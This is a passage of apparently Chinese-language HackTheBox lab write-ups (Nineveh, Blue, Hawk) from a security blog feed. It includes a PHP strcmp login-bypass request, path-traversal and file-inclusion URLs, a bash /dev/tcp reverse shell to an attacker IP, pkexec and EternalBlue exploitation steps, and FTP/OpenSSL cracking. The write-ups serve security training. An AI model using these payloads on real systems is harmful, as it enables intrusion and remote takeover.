&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_a0LhXJCdXL_hu8a2c84d4609b3bdda3c90db6b7504cb8_69939_310a41b282878de720f960becf0f53cf.webp 400w,
/post/hackbox/nineveh/image/image_a0LhXJCdXL_hu8a2c84d4609b3bdda3c90db6b7504cb8_69939_985de05ac3733fc4158d5f428cd6e885.webp 760w,
/post/hackbox/nineveh/image/image_a0LhXJCdXL_hu8a2c84d4609b3bdda3c90db6b7504cb8_69939_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_a0LhXJCdXL_hu8a2c84d4609b3bdda3c90db6b7504cb8_69939_310a41b282878de720f960becf0f53cf.webp"
width="1206"
height="443"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_UwSoJVWunk_hu4ae00f6b2fa5f9f055f995997f4650f3_13605_6323a8228910d37a9444e4b9b6a7ad12.webp 400w,
/post/hackbox/nineveh/image/image_UwSoJVWunk_hu4ae00f6b2fa5f9f055f995997f4650f3_13605_87194e186d73c41c7634597744ad7a58.webp 760w,
/post/hackbox/nineveh/image/image_UwSoJVWunk_hu4ae00f6b2fa5f9f055f995997f4650f3_13605_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_UwSoJVWunk_hu4ae00f6b2fa5f9f055f995997f4650f3_13605_6323a8228910d37a9444e4b9b6a7ad12.webp"
width="513"
height="117"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>文件写入，但是不在web目录，无法解析&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_lN21SD9U2U_hubef7ee884d657850fd40f30fbd3fd0f0_53053_9c29660097d5b355d0f527af5011d753.webp 400w,
/post/hackbox/nineveh/image/image_lN21SD9U2U_hubef7ee884d657850fd40f30fbd3fd0f0_53053_412f3ddb0c91a9a7fc487f15e78364bd.webp 760w,
/post/hackbox/nineveh/image/image_lN21SD9U2U_hubef7ee884d657850fd40f30fbd3fd0f0_53053_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_lN21SD9U2U_hubef7ee884d657850fd40f30fbd3fd0f0_53053_9c29660097d5b355d0f527af5011d753.webp"
width="767"
height="282"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里暂时没办法往下渗透了。&lt;/p>
&lt;p>查看&lt;code>info.php&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_He3vfLmKkP_hu50bc800c01d58bd127e829dfaaa6aceb_99624_d3d3ff44fdd0bed09406d335fb22d126.webp 400w,
/post/hackbox/nineveh/image/image_He3vfLmKkP_hu50bc800c01d58bd127e829dfaaa6aceb_99624_615e565cbdad610585f84be864893443.webp 760w,
/post/hackbox/nineveh/image/image_He3vfLmKkP_hu50bc800c01d58bd127e829dfaaa6aceb_99624_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_He3vfLmKkP_hu50bc800c01d58bd127e829dfaaa6aceb_99624_d3d3ff44fdd0bed09406d335fb22d126.webp"
width="1119"
height="668"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>allow_url_fopen=off&lt;/p>
&lt;p>allow_url_include=on&lt;/p>
&lt;p>&lt;a href="http://10.10.10.43/department/" target="_blank" rel="noopener">http://10.10.10.43/department/&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_InoiZmFTif_hu4d10aeb7d127c626d30c83a9146368cb_37850_6efa89850a567bd9bc4daecefdbafd27.webp 400w,
/post/hackbox/nineveh/image/image_InoiZmFTif_hu4d10aeb7d127c626d30c83a9146368cb_37850_9ea3994de722e4159a00879b30f654a6.webp 760w,
/post/hackbox/nineveh/image/image_InoiZmFTif_hu4d10aeb7d127c626d30c83a9146368cb_37850_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_InoiZmFTif_hu4d10aeb7d127c626d30c83a9146368cb_37850_6efa89850a567bd9bc4daecefdbafd27.webp"
width="970"
height="478"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里password参数存在php弱类型的问题&lt;/p>
&lt;p>把参数password改为password[]&lt;/p>
&lt;p>当传递参数去和密码比较的时候&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span>&lt;span class="o">(&lt;/span>strcmp&lt;span class="o">(&lt;/span>&lt;span class="nv">$_REQUEST&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="s1">&amp;#39;password&amp;#39;&lt;/span>&lt;span class="o">]&lt;/span>, &lt;span class="nv">$password&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>因为传递了一个数组去和密码进行比较，php会报错返回Null，Null和0去比较结果为true。导致if被绕过，导致可以直接登录&lt;/p>
&lt;p>以下请求直接登录成功&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">POST /department/login.php HTTP/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host: 10.10.10.43
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">User-Agent: Mozilla/5.0 &lt;span class="o">(&lt;/span>X11&lt;span class="p">;&lt;/span> Linux x86_64&lt;span class="p">;&lt;/span> rv:91.0&lt;span class="o">)&lt;/span> Gecko/20100101 Firefox/91.0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept: text/html,application/xhtml+xml,application/xml&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.9,image/webp,*/*&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Language: zh-CN,zh&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8,zh-TW&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.7,zh-HK&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.5,en-US&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.3,en&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.2
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Encoding: gzip, deflate
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Type: application/x-www-form-urlencoded
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Length: &lt;span class="m">24&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Origin: http://10.10.10.43
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Connection: close
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Referer: http://10.10.10.43/department/login.php
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Cookie: &lt;span class="nv">PHPSESSID&lt;/span>&lt;span class="o">=&lt;/span>aio9cnnl1ish99moqj1lu35it6
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Upgrade-Insecure-Requests: &lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">username&lt;/span>&lt;span class="o">=&lt;/span>admin&lt;span class="p">&amp;amp;&lt;/span>password&lt;span class="o">[]=&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>admin&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_hFhKp638kx_hu5925885441eb77f4cf9ac12ad4b51fc2_390513_dfa7c144e57747decf0c9f95e6b6bc80.webp 400w,
/post/hackbox/nineveh/image/image_hFhKp638kx_hu5925885441eb77f4cf9ac12ad4b51fc2_390513_f6c426fdc9183f8d12fb758f84cac4ed.webp 760w,
/post/hackbox/nineveh/image/image_hFhKp638kx_hu5925885441eb77f4cf9ac12ad4b51fc2_390513_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_hFhKp638kx_hu5925885441eb77f4cf9ac12ad4b51fc2_390513_dfa7c144e57747decf0c9f95e6b6bc80.webp"
width="1116"
height="761"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>notes参数存在文件包含，显示了ninevehNotes.txt的内容在下方&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_9-HY3APK_y_hu8ce4d7b4194c159a9013dbe21959e52e_404206_0f5baf494a8105f49f5df0635cf85fdb.webp 400w,
/post/hackbox/nineveh/image/image_9-HY3APK_y_hu8ce4d7b4194c159a9013dbe21959e52e_404206_48491393ed0a99680df26db844a4e2d0.webp 760w,
/post/hackbox/nineveh/image/image_9-HY3APK_y_hu8ce4d7b4194c159a9013dbe21959e52e_404206_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_9-HY3APK_y_hu8ce4d7b4194c159a9013dbe21959e52e_404206_0f5baf494a8105f49f5df0635cf85fdb.webp"
width="1149"
height="752"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>前面通过&lt;code>info.php&lt;/code>发现&lt;code>allow_url_include=on&lt;/code>是开启的，尝试使用php伪协议执行命令&lt;/p>
&lt;p>报错了，尝试了几次发现notes存在参数检查，必须包含&lt;code>ninevehNotes&lt;/code>字符串&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_SnaQ0j251V_hufd37074217f096a0190ad5e89d54234e_141388_04fb3f87e0c4e351164df74a2a7dab1b.webp 400w,
/post/hackbox/nineveh/image/image_SnaQ0j251V_hufd37074217f096a0190ad5e89d54234e_141388_57731bae608104d07e5571ec6870d871.webp 760w,
/post/hackbox/nineveh/image/image_SnaQ0j251V_hufd37074217f096a0190ad5e89d54234e_141388_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_SnaQ0j251V_hufd37074217f096a0190ad5e89d54234e_141388_04fb3f87e0c4e351164df74a2a7dab1b.webp"
width="1182"
height="781"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>notes=/ninevehNotes/../../../../../../../etc/passwd&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_bl4vZl8mGZ_huff24be340e734ef89f79bc429506fdd7_171701_78300592a1fc8262c4aff36fae2f5b03.webp 400w,
/post/hackbox/nineveh/image/image_bl4vZl8mGZ_huff24be340e734ef89f79bc429506fdd7_171701_6d9dfce1b3d258472af74617a3880991.webp 760w,
/post/hackbox/nineveh/image/image_bl4vZl8mGZ_huff24be340e734ef89f79bc429506fdd7_171701_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_bl4vZl8mGZ_huff24be340e734ef89f79bc429506fdd7_171701_78300592a1fc8262c4aff36fae2f5b03.webp"
width="1237"
height="724"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这样就无法直接包含&lt;code>php://input&lt;/code>&lt;/p>
&lt;p>可以包含443端口之前写入的恶意文件 &lt;code>/var/tmp/exp.php&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.43/department/manage.php?notes&lt;span class="o">=&lt;/span>/ninevehNotes/../../../var/tmp/exp.php&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cmd&lt;/span>&lt;span class="o">=&lt;/span>id
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_MjcKY98l30_hu33fd1512e4f58b1fba4f5bd2dbf63a3c_139462_9afae1b3f8a4e1078912d49a332249a1.webp 400w,
/post/hackbox/nineveh/image/image_MjcKY98l30_hu33fd1512e4f58b1fba4f5bd2dbf63a3c_139462_4eb20d961d7b14e7a5ed2e553644219f.webp 760w,
/post/hackbox/nineveh/image/image_MjcKY98l30_hu33fd1512e4f58b1fba4f5bd2dbf63a3c_139462_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_MjcKY98l30_hu33fd1512e4f58b1fba4f5bd2dbf63a3c_139462_9afae1b3f8a4e1078912d49a332249a1.webp"
width="1209"
height="660"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.43/department/manage.php?notes&lt;span class="o">=&lt;/span>/ninevehNotes/../../../var/tmp/exp.php&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cmd&lt;/span>&lt;span class="o">=&lt;/span>bash+-c+&lt;span class="s1">&amp;#39;bash+-i+&amp;gt;%26+/dev/tcp/10.10.16.3/2333+0&amp;gt;%261&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>获得shell&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_4s87y6TwBx_hua5d4f2f4d2b57069c3c2c21d4851107f_53930_72516e6fe1f9602c54caf056d03d83e3.webp 400w,
/post/hackbox/nineveh/image/image_4s87y6TwBx_hua5d4f2f4d2b57069c3c2c21d4851107f_53930_708fec23af23860634d6f21722d536e4.webp 760w,
/post/hackbox/nineveh/image/image_4s87y6TwBx_hua5d4f2f4d2b57069c3c2c21d4851107f_53930_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_4s87y6TwBx_hua5d4f2f4d2b57069c3c2c21d4851107f_53930_72516e6fe1f9602c54caf056d03d83e3.webp"
width="1007"
height="272"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>pkexec提权&lt;/p>
&lt;p>python3 &lt;a href="http://CVE-2021-4034-py3.py" title="CVE-2021-4034-py3.py" target="_blank" rel="noopener">CVE-2021-4034-py3.py&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_h3JEWLFUWz_hue501aecf2310b49e337d1b51c2be5410_9508_c5021a93ca03fd94b0ff3e2b7a029017.webp 400w,
/post/hackbox/nineveh/image/image_h3JEWLFUWz_hue501aecf2310b49e337d1b51c2be5410_9508_14319392577897bc02acd10c9853891e.webp 760w,
/post/hackbox/nineveh/image/image_h3JEWLFUWz_hue501aecf2310b49e337d1b51c2be5410_9508_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_h3JEWLFUWz_hue501aecf2310b49e337d1b51c2be5410_9508_c5021a93ca03fd94b0ff3e2b7a029017.webp"
width="692"
height="81"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Blue</title><link>https://docs.kaiasec.tk/post/hackbox/blue/</link><pubDate>Sat, 02 Jul 2022 10:35:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/blue/</guid><description>&lt;p>namp&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -p- -sV --script vuln -vv 10.10.10.40
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_pQZ-DR3u60_hu91053c9c1ddf2a6226755c31d2b63e6c_265587_3d1b94285a7e83d2d257f5a790719314.webp 400w,
/post/hackbox/blue/image/image_pQZ-DR3u60_hu91053c9c1ddf2a6226755c31d2b63e6c_265587_eb5f7dd56ba140e9d85bee7e837d6ec9.webp 760w,
/post/hackbox/blue/image/image_pQZ-DR3u60_hu91053c9c1ddf2a6226755c31d2b63e6c_265587_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_pQZ-DR3u60_hu91053c9c1ddf2a6226755c31d2b63e6c_265587_3d1b94285a7e83d2d257f5a790719314.webp"
width="1349"
height="460"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>nmap识别到存在永恒之蓝漏洞(ms17-010)&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_uopAst56aj_hu5ff6593482fe0d83914c8ab18df62c56_207822_7cfb39f228b85fba7e890a78a4bb1f97.webp 400w,
/post/hackbox/blue/image/image_uopAst56aj_hu5ff6593482fe0d83914c8ab18df62c56_207822_6fb56fbbf1c71890c073b67939e5e65e.webp 760w,
/post/hackbox/blue/image/image_uopAst56aj_hu5ff6593482fe0d83914c8ab18df62c56_207822_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_uopAst56aj_hu5ff6593482fe0d83914c8ab18df62c56_207822_7cfb39f228b85fba7e890a78a4bb1f97.webp"
width="1258"
height="450"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>msf&lt;/p>
&lt;p>use auxiliary/scanner/smb/smb_version&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_ABMwYFUDuo_hu43d363a62c348b56024e833695ee93e9_105481_4d8db2b44e5497bfa4a6883cc05fdd11.webp 400w,
/post/hackbox/blue/image/image_ABMwYFUDuo_hu43d363a62c348b56024e833695ee93e9_105481_4ca6f6cfa3667a45f7d27b828899b9e5.webp 760w,
/post/hackbox/blue/image/image_ABMwYFUDuo_hu43d363a62c348b56024e833695ee93e9_105481_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_ABMwYFUDuo_hu43d363a62c348b56024e833695ee93e9_105481_4d8db2b44e5497bfa4a6883cc05fdd11.webp"
width="1465"
height="209"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>use exploit/windows/smb/ms17_010_eternalblue&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">set&lt;/span> rhosts 10.10.10.40
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">set&lt;/span> lhost 10.10.14.12
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">run
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_WibfFJfdFY_hu91bc641e734e4990d16d8673d9841e1a_419617_7c54549ca458c7f3c526696065c6d17e.webp 400w,
/post/hackbox/blue/image/image_WibfFJfdFY_hu91bc641e734e4990d16d8673d9841e1a_419617_e007d341291c27ad6fbd3a4ac82a5b20.webp 760w,
/post/hackbox/blue/image/image_WibfFJfdFY_hu91bc641e734e4990d16d8673d9841e1a_419617_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_WibfFJfdFY_hu91bc641e734e4990d16d8673d9841e1a_419617_7c54549ca458c7f3c526696065c6d17e.webp"
width="1473"
height="681"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_diHKv15dWX_hu99e48dd9112983a3cd3e479ed5dc6787_65908_6573fdcabb604fbbe54108e9bfbc0105.webp 400w,
/post/hackbox/blue/image/image_diHKv15dWX_hu99e48dd9112983a3cd3e479ed5dc6787_65908_e7cf9c60c139c09ed686da3c8eb2a826.webp 760w,
/post/hackbox/blue/image/image_diHKv15dWX_hu99e48dd9112983a3cd3e479ed5dc6787_65908_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_diHKv15dWX_hu99e48dd9112983a3cd3e479ed5dc6787_65908_6573fdcabb604fbbe54108e9bfbc0105.webp"
width="830"
height="269"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>flag&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">cd&lt;/span> C:&lt;span class="se">\U&lt;/span>sers &lt;span class="p">|&lt;/span> dir
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">type&lt;/span> .&lt;span class="se">\A&lt;/span>dministrator&lt;span class="se">\D&lt;/span>esktop&lt;span class="se">\r&lt;/span>oot.txt &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nb">type&lt;/span> .&lt;span class="se">\h&lt;/span>aris&lt;span class="se">\D&lt;/span>esktop&lt;span class="se">\u&lt;/span>ser.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/blue/image/image_cEkrJ8YZuQ_hue4bf19fe9eb9b48584fb22f055cc19b3_163878_77bc244269c7a508241f835408b353a9.webp 400w,
/post/hackbox/blue/image/image_cEkrJ8YZuQ_hue4bf19fe9eb9b48584fb22f055cc19b3_163878_16bf5af52a6cb1ec7f45af1a526beb8c.webp 760w,
/post/hackbox/blue/image/image_cEkrJ8YZuQ_hue4bf19fe9eb9b48584fb22f055cc19b3_163878_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/blue/image/image_cEkrJ8YZuQ_hue4bf19fe9eb9b48584fb22f055cc19b3_163878_77bc244269c7a508241f835408b353a9.webp"
width="987"
height="520"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Hawk</title><link>https://docs.kaiasec.tk/post/hackbox/hawk/</link><pubDate>Mon, 27 Jun 2022 19:12:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/hawk/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -T4 -p- -vv -sV 10.10.10.102
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_V8BmusyG9K_hu3d35b6a39cfbc775714391cee6faf17b_82349_15379735e77101cecf32276695c05193.webp 400w,
/post/hackbox/hawk/image/image_V8BmusyG9K_hu3d35b6a39cfbc775714391cee6faf17b_82349_396ca96a52bec4096ea4ff55bfd6787f.webp 760w,
/post/hackbox/hawk/image/image_V8BmusyG9K_hu3d35b6a39cfbc775714391cee6faf17b_82349_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_V8BmusyG9K_hu3d35b6a39cfbc775714391cee6faf17b_82349_15379735e77101cecf32276695c05193.webp"
width="1190"
height="263"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>ftp匿名登录，发现&lt;code> .drupal.txt.enc&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_o8smoT8jrZ_hu75e120fa2f5fa764b4848d2a19b53291_107971_f3cbf72cae8421f56f7466f47b0795a3.webp 400w,
/post/hackbox/hawk/image/image_o8smoT8jrZ_hu75e120fa2f5fa764b4848d2a19b53291_107971_c5d8d1d667e435a67f10496094e9556c.webp 760w,
/post/hackbox/hawk/image/image_o8smoT8jrZ_hu75e120fa2f5fa764b4848d2a19b53291_107971_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_o8smoT8jrZ_hu75e120fa2f5fa764b4848d2a19b53291_107971_f3cbf72cae8421f56f7466f47b0795a3.webp"
width="909"
height="536"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>下载到本地查看发现是openssl文件base64编码了&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">wget -r ftp://10.10.10.102/messages/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_qRyGC7or1o_hu030b8cd6272eb14115bbbdbb9fd01005_161935_4b723ae526316e4d8b68b0e19b47ef20.webp 400w,
/post/hackbox/hawk/image/image_qRyGC7or1o_hu030b8cd6272eb14115bbbdbb9fd01005_161935_4e59b501db527416b3018fede0c447d5.webp 760w,
/post/hackbox/hawk/image/image_qRyGC7or1o_hu030b8cd6272eb14115bbbdbb9fd01005_161935_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_qRyGC7or1o_hu030b8cd6272eb14115bbbdbb9fd01005_161935_4b723ae526316e4d8b68b0e19b47ef20.webp"
width="1286"
height="602"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>base64解码后尝试openssl解密&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_H7oosxVvaq_hu7e48781d41f8467c162af046da149538_96466_3c9ec5c596f465218bfeaab31586863f.webp 400w,
/post/hackbox/hawk/image/image_H7oosxVvaq_hu7e48781d41f8467c162af046da149538_96466_926c39e191cbd6875be8ba19d6751844.webp 760w,
/post/hackbox/hawk/image/image_H7oosxVvaq_hu7e48781d41f8467c162af046da149538_96466_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_H7oosxVvaq_hu7e48781d41f8467c162af046da149538_96466_3c9ec5c596f465218bfeaab31586863f.webp"
width="911"
height="308"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>解密脚本&lt;/p>
&lt;p>&lt;a href="https://github.com/HrushikeshK/openssl-bruteforce" target="_blank" rel="noopener">https://github.com/HrushikeshK/openssl-bruteforce&lt;/a>&lt;/p>
